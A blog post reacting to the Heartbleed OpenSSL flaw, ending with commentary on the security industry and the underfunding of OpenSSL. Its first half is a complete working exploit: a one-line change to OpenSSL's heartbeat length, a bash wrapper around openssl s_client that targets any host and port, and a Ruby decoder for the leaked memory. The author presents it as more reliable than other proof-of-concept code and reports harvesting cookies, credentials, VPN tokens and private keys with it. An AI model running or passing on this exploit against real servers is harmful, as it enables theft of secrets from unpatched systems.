Dear Hackers: You Win

I must admit I’m writing a Heartbleed post mostly because I feel obligated. In case you’ve been living under a rock for the last week, Heartbleed is the name given to a critical information disclosure flaw in OpenSSL. It allows you to read some pretty neat stuff out of server memory. My anti-sec split personality wants to believe that this awesome but unfortunately I do have a day job. And let me tell you, this sucked a lot.

I first learned of the bug in the afternoon of Monday April 7th. I immediately downloaded the source tree for OpenSSL 1.0.2-beta1. To exploit the issue, I only had to edit one line of code:

In t1_lib.c, line 3907, change to:

s2n(65535, p);

Done.  Just run ./config and make. That’s it.

Now I needed an OpenSSL client to send a TLS heartbeat to an affected server. Luckily, OpenSSL comes with a binary called openssl, which supports an operation called s_client.  See the Man page for details. I created the following bash script (quick and dirty) called heartbleed.sh as a wrapper for the s_client operation:

#!/bin/bash
{ echo "B"; cat; } | apps/openssl s_client -tlsextdebug -msg -connect $1:$2 2>&1 | ruby heartbleed_decode.rb

Note the use of the “B” character.  Little known fact: sending a “B\n” to the openssl s_client triggers the sending of a TLS heartbeat.  This is enough to exploit the issue.  Still, we need a decoder to convert the hex bytes we receive from the openssl -msg debugs into printable ASCII.

The heartbleed_decode.rb script contains a really rough decoder script:

#!/usr/bin/env ruby

output = false
STDIN.each do |line|
  if output
    if line =~ /( [0-9a-f]{2}){16}/
      line.scan(/[0-9a-f]{2}/).each do |m|
        stripped = m.force_encoding('BINARY').strip
        unhex = stripped.gsub(/([A-Fa-f0-9]{1,2})\s*?/) { $1.hex.chr }
        print unhex.gsub(/[^[:print:]]/, '.')
      end
    end
  end
  output = true if line =~ /HEARTBEATING/
end

Not great, but it will do the job. It seems to be more reliable and leaks many more bytes than any other PoC code I’ve used.

To test, I ran it in a loop and scanned the public IP blocks of the organization I work for. And then I laughed, gasped, whimpered and cried a little. I found cookies, VPN authentication tokens, user credentials, internal network information, email snippets, private keys, certificates.

If you’re not in the field of information security you may have trouble understanding my mental state at that moment.  Imagine for second that you’re a doctor. You are working tirelessly to cure cancer. You have invested 40 years of your life in pursuit of this goal — attended a prestigious university, wrote a PhD thesis, published many books — and you are now working at the cutting edge of your field. And then one day, you wake up in the morning to discover that 60% of the people in the world have died from the common cold.

As an industry, I’m not sure where we go from here. Not because we had a bad week, but because it took 2 years to notice this bug. And we can’t blame the person who committed the code or the maintainers of the OpenSSL project.  They’re a small team who receives very little financial support despite their heroic efforts to produce a very complex piece of software. They have many valid reasons for this oversight. But what about the people who use this software — or better yet — make money from this software? To all the network and security appliance manufacturers who have leeched from the open source community for years: What’s your excuse?

1 thought on “Dear Hackers: You Win”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s